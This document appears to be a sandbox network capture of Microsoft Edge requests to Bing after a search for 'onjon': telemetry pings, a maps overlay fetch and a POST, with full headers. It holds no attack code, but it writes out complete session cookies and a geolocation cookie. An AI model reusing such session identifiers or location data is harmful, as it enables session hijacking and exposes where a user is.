content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-y5IvDmOcUNxV2zGscwAHyoDeuIU5VY+YBATIe9YCd1s='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingmap&ndcParam=QWthbWFp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b11a
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306930.7f1b161
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

cache-control: private
content-length: 313
content-type: application/json; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a314b474f65b49f2ceffdf57ce4
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-cPU6buWHM0P/8qubASCK7BkP36tOHfCwfXq1eL7w5Dk='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: B983F1C9BE324A33AC49B2AEBC145C6A Ref B: LON601060105054 Ref C: 2024-12-04T10:08:49Z
date: Wed, 04 Dec 2024 10:08:50 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:49 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0c9
GET

https://www.bing.com/maps/mapcontrol/v9/overlay?callback=initializeMap&partner=serp&branch=experimental

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/mapcontrol/v9/overlay?callback=initializeMap&partner=serp&branch=experimental HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: mapc=rm=0
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 8289
content-type: text/html; charset=utf-8
access-control-allow-origin: *
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a329fd94c8ca19d2811ce8ece69
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-frame-options: DENY
content-security-policy-report-only: script-src 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-aEID3Kreebp6dPdQqAD4eE9sBU6PSR8X3BXos1BvE6s='; base-uri 'self'; report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
ig: F11974D01F064C83981B22A3D2736CA1
date: Wed, 04 Dec 2024 10:08:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306930.7f1b282
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306920919%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22639.500000019325%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306920925%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221359.500000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306920925%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920984%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306920919%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22639.500000019325%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306920925%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221359.500000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306920925%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920984%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306930.7f1b3fd
GET

https://www.bing.com/maps/instrumentation?version=V9&q=&feature=omo

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/instrumentation?version=V9&q=&feature=omo HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: mapc=rm=0
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306930.7f1b4ec
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 291
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
